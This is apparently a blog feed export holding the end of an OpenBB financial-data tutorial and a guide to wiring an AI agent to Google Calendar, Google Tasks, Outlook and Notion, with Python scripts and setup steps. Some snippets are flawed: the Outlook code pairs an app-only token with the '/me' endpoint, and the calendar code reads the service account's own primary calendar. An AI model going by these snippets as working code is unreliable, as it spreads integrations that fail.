print(f\u0026#34;Volume: {int(latest[\u0026#39;volume\u0026#39;]):,}\u0026#34;) Fetch Cryptocurrency Data from openbb import obb # Get Bitcoin data output = obb.crypto.price.historical(\u0026#39;BTC-USD\u0026#39;, provider=\u0026#39;yfinance\u0026#39;, limit=30) df = output.to_dataframe() latest = df.iloc[-1] print(f\u0026#34;BTC Current Price: ${latest[\u0026#39;close\u0026#39;]:,.2f}\u0026#34;) Fetch Macroeconomic Data (OECD Countries) from openbb import obb # Get UK GDP try: output = obb.economy.gdp(country=\u0026#39;united_kingdom\u0026#39;, provider=\u0026#39;oecd\u0026#39;) df = output.to_dataframe() print(df.tail(5)) except Exception as e: print(f\u0026#34;GDP data fetch failed: {e}\u0026#34;) # Get unemployment rate try: output = obb.economy.unemployment(country=\u0026#39;united_kingdom\u0026#39;) df = output.to_dataframe() print(df.tail(5)) except Exception as e: print(f\u0026#34;Unemployment data fetch failed: {e}\u0026#34;) Building a Stock Analysis Script Create a complete stock analysis script for daily briefings:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;OpenBB Stock Analysis Script - Replacement for TwelveData\u0026#34;\u0026#34;\u0026#34; import sys sys.path.insert(0, \u0026#39;/path/to/your/openbb-env/lib/python3.13/site-packages\u0026#39;) import os from datetime import datetime, timedelta from openbb import obb # Stock list STOCKS = [\u0026#39;MSFT\u0026#39;, \u0026#39;AAPL\u0026#39;, \u0026#39;GOOGL\u0026#39;] def calculate_rsi(prices, period=14): \u0026#34;\u0026#34;\u0026#34;Calculate RSI indicator\u0026#34;\u0026#34;\u0026#34; if len(prices) \u0026lt; period + 1: return 50 deltas = [prices[i] - prices[i-1] for i in range(1, len(prices))] gains = [d if d \u0026gt; 0 else 0 for d in deltas[-period:]] losses = [-d if d \u0026lt; 0 else 0 for d in deltas[-period:]] avg_gain = sum(gains) / period avg_loss = sum(losses) / period if avg_loss == 0: return 100 rs = avg_gain / avg_loss rsi = 100 - (100 / (1 + rs)) return rsi def calculate_ma(prices, period): \u0026#34;\u0026#34;\u0026#34;Calculate Moving Average\u0026#34;\u0026#34;\u0026#34; if len(prices) \u0026lt; period: return prices[-1] return sum(prices[-period:]) / period def get_stock_analysis(symbol): \u0026#34;\u0026#34;\u0026#34;Get complete stock analysis\u0026#34;\u0026#34;\u0026#34; try: # Get 30 days of historical data output = obb.equity.price.historical(symbol, provider=\u0026#39;yfinance\u0026#39;, limit=35) df = output.to_dataframe() if df.empty: return None # Latest data latest = df.iloc[-1] prev = df.iloc[-2] # Price data current = latest[\u0026#39;close\u0026#39;] change = current - prev[\u0026#39;close\u0026#39;] change_pct = (change / prev[\u0026#39;close\u0026#39;]) * 100 volume = int(latest[\u0026#39;volume\u0026#39;]) # 30-day statistics high_30 = df[\u0026#39;high\u0026#39;].max() low_30 = df[\u0026#39;low\u0026#39;].min() prices = df[\u0026#39;close\u0026#39;].tolist() # Technical indicators rsi = calculate_rsi(prices) ma20 = calculate_ma(prices, 20) # Trend judgment if current \u0026gt; ma20: trend = \u0026#34;📈 Uptrend\u0026#34; elif current \u0026lt; ma20: trend = \u0026#34;📉 Downtrend\u0026#34; else: trend = \u0026#34;➡️ Sideways\u0026#34; # RSI signal if rsi \u0026gt; 70: rsi_signal = \u0026#34;⚠️ Overbought\u0026#34; elif rsi \u0026lt; 30: rsi_signal = \u0026#34;💡 Oversold\u0026#34; else: rsi_signal = \u0026#34;📊 Normal\u0026#34; # 52-week position (estimated from 30-day data) week52_position = ((current - low_30) / (high_30 - low_30)) * 100 if high_30 != low_30 else 50 return { \u0026#39;symbol\u0026#39;: symbol, \u0026#39;current\u0026#39;: current, \u0026#39;change\u0026#39;: change, \u0026#39;change_pct\u0026#39;: change_pct, \u0026#39;volume\u0026#39;: volume, \u0026#39;high_30\u0026#39;: high_30, \u0026#39;low_30\u0026#39;: low_30, \u0026#39;rsi\u0026#39;: rsi, \u0026#39;rsi_signal\u0026#39;: rsi_signal, \u0026#39;ma20\u0026#39;: ma20, \u0026#39;trend\u0026#39;: trend, \u0026#39;week52_position\u0026#39;: week52_position } except Exception as e: print(f\u0026#34;❌ {symbol} error: {str(e)[:50]}\u0026#34;, file=sys.stderr) return None def main(): \u0026#34;\u0026#34;\u0026#34;Main function\u0026#34;\u0026#34;\u0026#34; print(\u0026#34;📊 **Stock Technical Analysis Report** - {} ({})\u0026#34;) for symbol in STOCKS: data = get_stock_analysis(symbol) if data: # Format output emoji = \u0026#34;🟢\u0026#34; if data[\u0026#39;change\u0026#39;] \u0026gt;= 0 else \u0026#34;🔴\u0026#34; print(f\u0026#34;{emoji} **{data[\u0026#39;symbol\u0026#39;]}**\u0026#34;) print(f\u0026#34; Current: ${data[\u0026#39;current\u0026#39;]:.2f} ({data[\u0026#39;change\u0026#39;]:+.2f}, {data[\u0026#39;change_pct\u0026#39;]:+.2f}%)\u0026#34;) print(f\u0026#34; Volume: {data[\u0026#39;volume\u0026#39;]:,}\u0026#34;) print(f\u0026#34; Trend: {data[\u0026#39;trend\u0026#39;]}\u0026#34;) print(f\u0026#34; RSI(14): {data[\u0026#39;rsi\u0026#39;]:.1f} {data[\u0026#39;rsi_signal\u0026#39;]}\u0026#34;) print(f\u0026#34; MA20: ${data[\u0026#39;ma20\u0026#39;]:.2f}\u0026#34;) print(f\u0026#34; 30-Day Range: ${data[\u0026#39;low_30\u0026#39;]:.2f} - ${data[\u0026#39;high_30\u0026#39;]:.2f}\u0026#34;) print(f\u0026#34; Range Position: {data[\u0026#39;week52_position\u0026#39;]:.1f}%\u0026#34;) print() print(\u0026#34;💡 Data Source: OpenBB (yfinance)\u0026#34;) print(\u0026#34;⚠️ For reference only, not investment advice\u0026#34;) if __name__ == \u0026#39;__main__\u0026#39;: main() Integration with AI Agents Update Scheduled Tasks Edit your AI agent\u0026rsquo;s cron configuration to use the OpenBB script:\n{ \u0026#34;id\u0026#34;: \u0026#34;your-job-id-here\u0026#34;, \u0026#34;name\u0026#34;: \u0026#34;Daily Stock Analysis - 8:30 AM\u0026#34;, \u0026#34;enabled\u0026#34;: true, \u0026#34;schedule\u0026#34;: { \u0026#34;kind\u0026#34;: \u0026#34;cron\u0026#34;, \u0026#34;expr\u0026#34;: \u0026#34;0 30 8 * * 1-5\u0026#34;, \u0026#34;tz\u0026#34;: \u0026#34;Asia/Shanghai\u0026#34; }, \u0026#34;payload\u0026#34;: { \u0026#34;kind\u0026#34;: \u0026#34;agentTurn\u0026#34;, \u0026#34;message\u0026#34;: \u0026#34;Execute script: python3 ~/.openclaw/workspace/openbb_stock_analysis.py. Send the script output as your reply without any additional explanation.\u0026#34; }, \u0026#34;delivery\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;announce\u0026#34;, \u0026#34;to\u0026#34;: \u0026#34;discord:YOUR_CHANNEL_ID\u0026#34; } } Data Comparison: OpenBB vs Commercial APIs Stock Data Comparison Metric OpenBB (yfinance) TwelveData Real-time 15-min delayed 15-min delayed Data Fields OHLCV OHLCV Technical Indicators Manual calculation Partially provided Free Tier Unlimited 800 calls/day Stability Good Good Extended Data Dimensions OpenBB Additional Support:\n✅ Cryptocurrency (BTC, ETH, etc.) ✅ Macroeconomic data (OECD countries) ✅ Fundamental data (with API configuration) ✅ Multi-source aggregation Commercial API Advantages:\n✅ Direct technical indicators (RSI, MACD, etc.) ✅ WebSocket real-time data (paid) ✅ More user-friendly API design Other Use Cases for OpenBB Beyond AI agent integration, OpenBB is suitable for:\n1. Quantitative Trading Strategy Development Backtesting: Test strategies using historical data Real-time signals: Generate trading signals based on technical indicators Portfolio optimization: Calculate optimal asset allocation 2. Academic Research \u0026amp; Data Analysis Economic papers: Empirical analysis with macroeconomic data Financial research: Stock return distributions, volatility analysis Data science: Training data for machine learning models 3. Personal Finance \u0026amp; Investment Tracking Portfolio monitoring: Track holdings in real-time Asset allocation analysis: Stock/bond ratios, sector distribution Risk assessment: VaR, maximum drawdown calculations 4. Corporate Financial Analysis Competitor analysis: Financial data of listed companies Industry research: Industry trends, market share analysis Risk monitoring: Supply chain risks, currency risks 5. Education \u0026amp; Training Finance courses: Free data sources for students Programming education: Hands-on Python financial data analysis Case studies: Real market data examples 6. News \u0026amp; Content Creation Financial media: Data-backed viewpoints Market commentary: Analysis reports based on data Data journalism: Visualizing market trends FAQ Q1: Why do some data sources require API Keys? A: High-quality sources (like FRED, Alpha Vantage) require registration for API keys, but usually have free tiers. This is to control access frequency and track usage.\nQ2: Can OpenBB get real-time data? A: yfinance provides delayed data (typically 15-20 minutes). For real-time data, you need to configure paid sources (like Polygon.io, Tradier).\nQ3: How to extend data sources? A: OpenBB supports plugin extensions. Install additional data source packages via pip:\npip install openbb-fred # FRED data source pip install openbb-polygon # Polygon.io data source Summary OpenBB is a powerful open-source financial data platform, especially suitable for:\n✅ High-frequency usage: Unlimited free tier ✅ Cryptocurrency: Native support ✅ Macroeconomics: OECD, FRED, and other sources ✅ Self-hosting: Data autonomy and control ✅ AI Integration: MCP Server support Reference Resources OpenBB Official Documentation OpenBB GitHub yfinance Documentation FRED API Registration Choose the solution that fits your needs and build an autonomous, controllable financial data infrastructure.\n","permalink":"https://www.d5n.xyz/en/posts/openbb-deployment-guide/","summary":"\u003ch2 id=\"why-openbb\"\u003eWhy OpenBB?\u003c/h2\u003e\n\u003cp\u003eWhen using commercial financial data APIs (like TwelveData), you often encounter these issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRate limits\u003c/strong\u003e: Daily caps on API calls (e.g., 800/day)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLimited data coverage\u003c/strong\u003e: No support for crypto or macroeconomic data\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCost concerns\u003c/strong\u003e: Paid upgrades required for high-frequency usage\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVendor lock-in\u003c/strong\u003e: Data formats and API designs tied to specific providers\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOpenBB\u003c/strong\u003e is an open-source financial data platform that provides a \u0026ldquo;connect once, consume everywhere\u0026rdquo; solution.\u003c/p\u003e\n\u003ch3 id=\"core-advantages-of-openbb\"\u003eCore Advantages of OpenBB\u003c/h3\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eFeature\u003c/th\u003e\n \u003cth\u003eOpenBB\u003c/th\u003e\n \u003cth\u003eCommercial API (TwelveData)\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eCost\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eFree \u0026amp; Open Source\u003c/td\u003e\n \u003ctd\u003eLimited free tier\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eData Sources\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eMulti-source aggregation (yfinance, FRED, etc.)\u003c/td\u003e\n \u003ctd\u003eSingle source\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eCryptocurrency\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e✅ Supported\u003c/td\u003e\n \u003ctd\u003e❌ Not supported\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eMacroeconomics\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e✅ Supported (OECD, FRED)\u003c/td\u003e\n \u003ctd\u003e❌ Not supported\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eTechnical Indicators\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e✅ Built-in calculation\u003c/td\u003e\n \u003ctd\u003eManual calculation\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eVendor Lock-in\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e❌ None\u003c/td\u003e\n \u003ctd\u003e✅ Strong dependency\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"environment-setup\"\u003eEnvironment Setup\u003c/h2\u003e\n\u003cp\u003eThis guide is based on the following environment:\u003c/p\u003e","title":"Building an Open-Source Financial Data Platform with OpenBB: A Complete Guide to Replacing Commercial APIs"},{"content":"Why Do AI Agents Need Schedule Management? When you ask your AI agent \u0026ldquo;What\u0026rsquo;s on my schedule today?\u0026rdquo; or \u0026ldquo;Create a meeting for tomorrow at 3 PM,\u0026rdquo; it should execute accurately, not say \u0026ldquo;I don\u0026rsquo;t know.\u0026rdquo;\nA complete AI agent schedule system should have:\n📅 Read schedules - Know what\u0026rsquo;s happening today and tomorrow ⏰ Timely reminders - Push notifications at the right time 📝 Task tracking - Manage to-do items and completion status 🤖 Proactive creation - AI can create new events and tasks for you 🔄 Multi-device sync - Accessible from phone, computer, and AI assistant But choosing the right solution isn\u0026rsquo;t easy—network environment, configuration complexity, and usage habits all affect the decision.\nSolution Overview Solution China Stability Setup Difficulty AI Can Create Best For Google Calendar ⭐⭐ (needs VPN) ⭐⭐⭐ Complex ✅ Yes Overseas users, full Google ecosystem Microsoft Outlook ⭐⭐⭐⭐⭐ Excellent ⭐⭐ Medium ✅ Yes Enterprise users, Microsoft ecosystem Notion ⭐⭐⭐⭐ Good ⭐ Simple ✅ Yes Knowledge workers, flexible databases Local Markdown ⭐⭐⭐⭐⭐ Perfect ⭐ Minimal ✅ Yes Privacy-first, quick start Solution 1: Google Calendar Who It\u0026rsquo;s For Already have Google account and calendar data Network environment can stably access Google Need AI assistant that can both read AND create events and tasks Key Advantages Complete ecosystem - Calendar + Tasks dual functionality, AI can read and write Mature API - Python official library support with comprehensive debugging docs Fine-grained permissions - Control AI to have read-only or full control Generous free tier - Almost unlimited for personal use Main Drawbacks Difficult China access - Needs stable VPN/proxy Relatively complex setup - Involves two authentication methods working together Permission pitfalls - IAM roles, API scopes, and calendar sharing permissions can be confusing Our Configuration Approach Based on real deployment experience, we use a hybrid authentication approach:\nFeature Auth Method Reason Calendar Service Account Calendars can be shared with Service Account, suitable for automated access Tasks OAuth Google Tasks cannot be shared like calendars, must use OAuth to access personal task list 💡 Lesson learned: We initially tried to use Service Account for both calendar and tasks, but discovered Tasks API doesn\u0026rsquo;t support Service Account access to personal task lists. We ended up with a hybrid solution: Service Account for calendar, OAuth for tasks.\nStep 1: Create Google Cloud Project Visit Google Cloud Console Click project selector → New Project Project name: ai-schedule-demo Click Create Step 2: Enable APIs Enable two APIs:\nSearch \u0026ldquo;Google Calendar API\u0026rdquo; → Click Enable Search \u0026ldquo;Tasks API\u0026rdquo; → Click Enable Step 3: Configure Calendar Access (Service Account) Service Account is suitable for calendar access because calendars can be explicitly shared with it.\n3.1 Create Service Account Google Cloud Console → IAM \u0026amp; Admin → Service Accounts Click Create Service Account Name: calendar-reader Click Create and Continue Role selection: If AI only needs to read calendar → Viewer If AI needs to create/edit events → Editor Click Done 📌 Permission note: The IAM role selected here controls the Service Account\u0026rsquo;s access to Google Cloud resources. If you need AI to create events later, choose the Editor role.\n3.2 Create Key Click the Service Account you just created → Keys tab Add Key → Create new key → JSON Download and save as service-account.json Move to config directory: mkdir -p ~/.config/google-calendar cp ~/Downloads/service-account.json ~/.config/google-calendar/ chmod 600 ~/.config/google-calendar/service-account.json 3.3 Share Calendar with Service Account Critical step: Service Account cannot automatically access your calendar; you must explicitly share it.\nOpen Google Calendar Left side find the calendar to sync → Click ⋮ → Settings and sharing Share with specific people → Add people Enter Service Account email (like calendar-reader@ai-schedule-demo.iam.gserviceaccount.com) Permission selection: See all event details - AI can only read Make changes to events - AI can create and edit events ⚠️ Common error: If you forget to share the calendar, or set permission to \u0026ldquo;See only free/busy,\u0026rdquo; the API returns empty list or 403 error.\n3.4 Python Code - Read Calendar Create google_calendar.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Google Calendar Reader - Service Account Method\u0026#34;\u0026#34;\u0026#34; import os from datetime import datetime, timedelta from google.oauth2 import service_account from googleapiclient.discovery import build # Service Account config SCOPES = [\u0026#39;https://www.googleapis.com/auth/calendar.readonly\u0026#39;] SERVICE_ACCOUNT_FILE = os.path.expanduser(\u0026#39;~/.config/google-calendar/service-account.json\u0026#39;) CALENDAR_ID = \u0026#39;primary\u0026#39; # Primary calendar, or shared calendar ID def get_today_events(): \u0026#34;\u0026#34;\u0026#34;Get today\u0026#39;s events\u0026#34;\u0026#34;\u0026#34; if not os.path.exists(SERVICE_ACCOUNT_FILE): return \u0026#34; ⚠️ Service Account not configured\u0026#34; try: creds = service_account.Credentials.from_service_account_file( SERVICE_ACCOUNT_FILE, scopes=SCOPES) service = build(\u0026#39;calendar\u0026#39;, \u0026#39;v3\u0026#39;, credentials=creds) # Today\u0026#39;s time range now = datetime.now() start = now.replace(hour=0, minute=0, second=0).isoformat() + \u0026#39;+08:00\u0026#39; end = (now + timedelta(days=1)).replace(hour=0, minute=0, second=0).isoformat() + \u0026#39;+08:00\u0026#39; events_result = service.events().list( calendarId=CALENDAR_ID, timeMin=start, timeMax=end, singleEvents=True, orderBy=\u0026#39;startTime\u0026#39; ).execute() events = events_result.get(\u0026#39;items\u0026#39;, []) if not events: return \u0026#34; • No events today\u0026#34; lines = [] for event in events: start = event[\u0026#39;start\u0026#39;].get(\u0026#39;dateTime\u0026#39;, event[\u0026#39;start\u0026#39;].get(\u0026#39;date\u0026#39;)) if \u0026#39;T\u0026#39; in start: time_str = start[11:16] else: time_str = \u0026#39;All day\u0026#39; lines.append(f\u0026#34; • {time_str} {event[\u0026#39;summary\u0026#39;]}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:50]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_today_events()) Step 4: Configure Task Access (OAuth) Google Tasks cannot be shared like calendars; you must use OAuth to access your personal task list.\n4.1 Configure OAuth Consent Screen Left menu → APIs \u0026amp; Services → OAuth consent screen User type: External (for personal accounts) App name: AI Schedule User support email: Select your Gmail Developer contact info: Enter your email Click Save and Continue 4.2 Add API Scopes Add Tasks permissions (choose based on needs):\nRead-only:\nhttps://www.googleapis.com/auth/tasks.readonly - Read tasks Full permissions (AI can create/complete tasks):\nhttps://www.googleapis.com/auth/tasks - Full task control Setup steps:\nAdd or remove scopes → Add the URL above Click Update → Save and Continue Test users → Add users → Enter your Gmail address Click Save and Continue → Back to dashboard 📌 Permission note: With the above configuration, AI can only read tasks. If you need AI to create tasks later, use the tasks full permission and re-authorize.\n4.3 Create OAuth Client ID Credentials → Create credentials → OAuth client ID Application type: Desktop app Name: OpenClaw Desktop Click Create Download JSON file, rename to client_secret.json Move to config directory: cp ~/Downloads/client_secret.json ~/.config/google-calendar/ chmod 600 ~/.config/google-calendar/client_secret.json 4.4 Python Code - Read Tasks Create google_tasks.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Google Tasks Reader - OAuth Method\u0026#34;\u0026#34;\u0026#34; import os import pickle from datetime import datetime from google_auth_oauthlib.flow import InstalledAppFlow from google.auth.transport.requests import Request from googleapiclient.discovery import build # OAuth config SCOPES = [\u0026#39;https://www.googleapis.com/auth/tasks.readonly\u0026#39;] CLIENT_SECRET_FILE = os.path.expanduser(\u0026#39;~/.config/google-calendar/client_secret.json\u0026#39;) TOKEN_FILE = os.path.expanduser(\u0026#39;~/.config/google-calendar/token.json\u0026#39;) def get_credentials(): \u0026#34;\u0026#34;\u0026#34;Get OAuth credentials, first run requires browser authorization\u0026#34;\u0026#34;\u0026#34; creds = None if os.path.exists(TOKEN_FILE): with open(TOKEN_FILE, \u0026#39;rb\u0026#39;) as token: creds = pickle.load(token) if not creds or not creds.valid: if creds and creds.expired and creds.refresh_token: creds.refresh(Request()) else: if not os.path.exists(CLIENT_SECRET_FILE): print(\u0026#34;❌ client_secret.json not found\u0026#34;) return None flow = InstalledAppFlow.from_client_secrets_file( CLIENT_SECRET_FILE, SCOPES) # For headless environments, use manual authorization auth_url, _ = flow.authorization_url(prompt=\u0026#39;consent\u0026#39;) print(f\u0026#34;Please visit this URL to authorize:\\n{auth_url}\\n\u0026#34;) code = input(\u0026#34;Enter authorization code: \u0026#34;) flow.fetch_token(code=code) creds = flow.credentials # Save token os.makedirs(os.path.dirname(TOKEN_FILE), exist_ok=True) with open(TOKEN_FILE, \u0026#39;wb\u0026#39;) as token: pickle.dump(creds, token) return creds def get_tasks(): \u0026#34;\u0026#34;\u0026#34;Get to-do tasks\u0026#34;\u0026#34;\u0026#34; try: creds = get_credentials() if not creds: return \u0026#34; ⚠️ Not authorized\u0026#34; service = build(\u0026#39;tasks\u0026#39;, \u0026#39;v1\u0026#39;, credentials=creds) result = service.tasks().list( tasklist=\u0026#39;@default\u0026#39;, showCompleted=False, maxResults=10 ).execute() tasks = result.get(\u0026#39;items\u0026#39;, []) if not tasks: return \u0026#34; • No tasks\u0026#34; lines = [] today = datetime.now().strftime(\u0026#39;%Y-%m-%d\u0026#39;) for task in tasks: title = task.get(\u0026#39;title\u0026#39;, \u0026#39;Untitled\u0026#39;) due = task.get(\u0026#39;due\u0026#39;, \u0026#39;\u0026#39;) if due: due_date = due[:10] if due_date \u0026lt; today: prefix = \u0026#34; ⚠️ Overdue: \u0026#34; elif due_date == today: prefix = \u0026#34; 📌 Today: \u0026#34; else: prefix = \u0026#34; • \u0026#34; else: prefix = \u0026#34; • \u0026#34; lines.append(f\u0026#34;{prefix}{title}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:40]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📋 **To-Do Tasks**\u0026#34;) print(get_tasks()) First run requires authorization:\npip3 install --user google-auth-oauthlib google-api-python-client python3 google_tasks.py # Will show authorization URL, open in browser, copy code and paste Step 5: Integrate into Daily Brief Integrate in rss_news.py:\ndef get_schedule_section(): \u0026#34;\u0026#34;\u0026#34;Get schedule section\u0026#34;\u0026#34;\u0026#34; # Calendar uses Service Account from google_calendar import get_today_events # Tasks uses OAuth from google_tasks import get_tasks lines = [] lines.append(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) lines.append(get_today_events()) lines.append(\u0026#34;\u0026#34;) lines.append(\u0026#34;📋 **To-Do Tasks**\u0026#34;) lines.append(get_tasks()) return \u0026#39;\\n\u0026#39;.join(lines) Permission Upgrade: Let AI Create Events and Tasks With the above configuration, AI can only read events and tasks. If you need AI to create events or tasks, upgrade permissions:\nUpgrade Calendar Permissions (Service Account) 1. Modify IAM Role\nGoogle Cloud Console → IAM \u0026amp; Admin → IAM Find Service Account → Click Edit Change role to: Editor Click Save 2. Ensure Calendar Sharing Permission is Correct\nGoogle Calendar → Calendar settings Service Account permission must be \u0026ldquo;Make changes to events\u0026rdquo; 3. Update Code Scope\n# From readonly to full permission SCOPES = [\u0026#39;https://www.googleapis.com/auth/calendar\u0026#39;] Upgrade Task Permissions (OAuth) 1. Modify Google Cloud Scopes\nAPIs \u0026amp; Services → OAuth consent screen → Edit app Add or remove scopes, change tasks.readonly to tasks Click Update → Save 2. Update Code Permissions\nSCOPES = [\u0026#39;https://www.googleapis.com/auth/tasks\u0026#39;] # Remove .readonly 3. Re-authorize\nrm ~/.config/google-calendar/token.json python3 google_tasks.py # Revisit authorization URL, get new authorization code 💡 Real experience: I started with read-only permissions. When I wanted AI to create tasks, I discovered I needed: (1) Correct Google Cloud scopes + (2) Correct code scope + (3) Re-authorization. After deleting token and re-authorizing, AI could create events for me.\nSolution 2: Microsoft Outlook / 365 Who It\u0026rsquo;s For Use Outlook email or Office 365 Enterprise/school provides Microsoft account Need stable China access Key Advantages Excellent China stability - Microsoft has CDN in China Enterprise integration - Deep integration with Teams, Outlook Personal free tier - Outlook.com accounts work Main Drawbacks Slightly complex setup - Requires Azure AD app registration Permission approval - Some permissions need admin consent Setup from Scratch Step 1: Register Azure AD App Visit Azure Portal Search Azure Active Directory → App registrations → New registration Fill in: Name: ai-schedule-outlook Supported account types: Accounts in any organizational directory + personal Microsoft accounts Click Register Step 2: Configure Authentication Click Manage → Authentication → Add a platform Select Mobile and desktop applications Check https://login.microsoftonline.com/common/oauth2/nativeclient Click Configure Step 3: Get Application Credentials Copy Application (client) ID Left side Certificates \u0026amp; secrets → New client secret Description: schedule-access Expires: 24 months Click Add, immediately copy the secret value (shown only once!) Step 4: Add API Permissions API permissions → Add a permission → Microsoft Graph Delegated permissions → Search and add: Calendars.Read Tasks.Read Click Grant admin consent Step 5: Place Credentials Create config file ~/.config/outlook/config.py:\nCLIENT_ID = \u0026#39;your-application-id\u0026#39; CLIENT_SECRET = \u0026#39;your-client-secret\u0026#39; TENANT_ID = \u0026#39;common\u0026#39; # For personal accounts Step 6: Python Code # Install dependencies pip3 install --user msal requests Create get_outlook_schedule.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Microsoft Outlook/365 Schedule Retrieval\u0026#34;\u0026#34;\u0026#34; import os import sys from datetime import datetime, timedelta sys.path.insert(0, os.path.expanduser(\u0026#39;~/.config/outlook\u0026#39;)) try: import msal import requests except ImportError: print(\u0026#34;Please install: pip3 install --user msal requests\u0026#34;) sys.exit(1) try: from config import CLIENT_ID, CLIENT_SECRET, TENANT_ID except ImportError: print(\u0026#34;Please create ~/.config/outlook/config.py\u0026#34;) sys.exit(1) def get_token(): \u0026#34;\u0026#34;\u0026#34;Get access token\u0026#34;\u0026#34;\u0026#34; authority = f\u0026#34;https://login.microsoftonline.com/{TENANT_ID}\u0026#34; app = msal.ConfidentialClientApplication( CLIENT_ID, authority=authority, client_credential=CLIENT_SECRET ) result = app.acquire_token_for_client(scopes=[\u0026#34;https://graph.microsoft.com/.default\u0026#34;]) if \u0026#34;access_token\u0026#34; in result: return result[\u0026#34;access_token\u0026#34;] else: print(f\u0026#34;Auth failed: {result.get(\u0026#39;error_description\u0026#39;)}\u0026#34;) return None def get_calendar_events(): \u0026#34;\u0026#34;\u0026#34;Get calendar events\u0026#34;\u0026#34;\u0026#34; token = get_token() if not token: return \u0026#34; ⚠️ Auth failed\u0026#34; headers = {\u0026#39;Authorization\u0026#39;: f\u0026#39;Bearer {token}\u0026#39;} now = datetime.now() start = now.replace(hour=0, minute=0, second=0).isoformat() end = (now + timedelta(days=1)).replace(hour=0, minute=0, second=0).isoformat() url = \u0026#34;https://graph.microsoft.com/v1.0/me/calendar/calendarView\u0026#34; params = { \u0026#39;startDateTime\u0026#39;: start, \u0026#39;endDateTime\u0026#39;: end, \u0026#39;$select\u0026#39;: \u0026#39;subject,start,end\u0026#39; } try: response = requests.get(url, headers=headers, params=params) events = response.json().get(\u0026#39;value\u0026#39;, []) if not events: return \u0026#34; • No events\u0026#34; lines = [] for event in events: start_time = event[\u0026#39;start\u0026#39;][\u0026#39;dateTime\u0026#39;][:16].replace(\u0026#39;T\u0026#39;, \u0026#39; \u0026#39;) lines.append(f\u0026#34; • {start_time} {event[\u0026#39;subject\u0026#39;]}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:40]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_calendar_events()) Solution 3: Notion Who It\u0026rsquo;s For Already use Notion for knowledge/project management Like flexible database structures Need to manage tasks and schedules together Key Advantages Simplest setup - Done in 5 minutes Visual editing - Table view is intuitive All-in-one - Schedules, tasks, notes together Good China stability - Notion works in China Main Drawbacks Requires manual maintenance - Can\u0026rsquo;t auto-sync like calendars Limited features - No recurring events like professional calendars Setup from Scratch Step 1: Create Notion Integration Visit Notion Integrations Click New integration Fill in: Name: AI Schedule Associated workspace: Select your workspace Click Submit, copy Internal Integration Token (secret_xxx) Step 2: Create Schedule Database Create a page in Notion, add Database (table view) Add properties: Name (Title) - Event/task title Date (Date) - Event date Time (Text, optional) - Specific time Type (Select, optional) - Event/Task Step 3: Share Database Open database page, click Share top right Click Invite, select your Integration Permission: Can read Step 4: Get Database ID Copy from browser address bar:\nhttps://www.notion.so/abc123def456?v=... ^^^^^^^^^^^^ This is Database ID Step 5: Place Credentials Create config file ~/.config/notion/config.py:\nNOTION_TOKEN = \u0026#39;secret_xxx-your-token\u0026#39; DATABASE_ID = \u0026#39;abc123-your-database-id\u0026#39; DATE_PROPERTY = \u0026#39;Date\u0026#39; TITLE_PROPERTY = \u0026#39;Name\u0026#39; Step 6: Python Code # Install dependencies pip3 install --user requests Create get_notion_schedule.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Notion Schedule Retrieval\u0026#34;\u0026#34;\u0026#34; import os import sys from datetime import datetime sys.path.insert(0, os.path.expanduser(\u0026#39;~/.config/notion\u0026#39;)) try: import requests except ImportError: print(\u0026#34;Please install: pip3 install --user requests\u0026#34;) sys.exit(1) try: from config import NOTION_TOKEN, DATABASE_ID, DATE_PROPERTY, TITLE_PROPERTY except ImportError: print(\u0026#34;Please create ~/.config/notion/config.py\u0026#34;) sys.exit(1) def get_today_schedule(): \u0026#34;\u0026#34;\u0026#34;Get today\u0026#39;s schedule\u0026#34;\u0026#34;\u0026#34; headers = { \u0026#39;Authorization\u0026#39;: f\u0026#39;Bearer {NOTION_TOKEN}\u0026#39;, 